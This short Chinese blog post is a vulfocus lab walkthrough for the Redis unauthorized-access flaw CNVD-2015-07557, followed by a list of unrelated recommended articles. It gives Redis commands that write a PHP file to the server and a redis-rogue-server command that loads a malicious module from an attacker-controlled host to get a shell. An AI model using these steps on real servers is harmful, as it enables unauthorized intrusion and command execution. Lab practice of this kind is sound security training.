vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

目标系统的权限不够redis 用户无法写计划任务和公钥,而且也没有开放ssh端口。

主从复制getshell,写入恶意的so文件达到执行系统命令的目的。

github上有一键可以利用的脚本

https://github.com/n0b0dyCN/redis-rogue-server.git

利用条件:需要web目录有读写权限,只有读权限会失败

工具连接:redis-rogue-server

向目标写入文件(前提是目标有网站)

config set dir /tmp #创建临时目录

config set dbfilename 1.php #写入文件

set test "<?php phpinfo(); ?>" #向文件中写入内容

bgsave #保存

save #保存

证明web目录具有写权限,可以进行利用

确认靶机有可写权限后,

利用:攻击机进入到cd redis-rogue-server文件夹里面

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP

成功后,可以执行命令

ls /tmp即可得到flag

相关推荐
骑着王八撵玉兔1 小时前
【性能优化与架构调优(二)】高性能数据库设计与优化
数据库·性能优化·架构
都叫我大帅哥2 小时前
🌊 Redis Stream深度探险:从秒杀系统到面试通关
java·redis
都叫我大帅哥2 小时前
Redis持久化全解析:从健忘症患者到记忆大师的逆袭
java·redis
想要入门的程序猿2 小时前
Qt写入excel
数据库·qt·excel
Q_970956392 小时前
java+vue+SpringBoo校园失物招领网站(程序+数据库+报告+部署教程+答辩指导)
java·数据库·vue.js
Wyc724092 小时前
Maven
java·数据库·maven
程序猿小D3 小时前
[附源码+数据库+毕业论文]基于Spring+MyBatis+MySQL+Maven+jsp实现的电影小说网站管理系统,推荐!
java·数据库·mysql·spring·毕业设计·ssm框架·电影小说网站
羊小猪~~3 小时前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研
野蛮人6号3 小时前
黑马点评系列问题之基础篇p7 06初识redis无法在虚拟机查到图形化界面存进去的键
redis·黑马点评
CodeWithMe3 小时前
【Note】《深入理解Linux内核》 Chapter 15 :深入理解 Linux 页缓存
linux·spring·缓存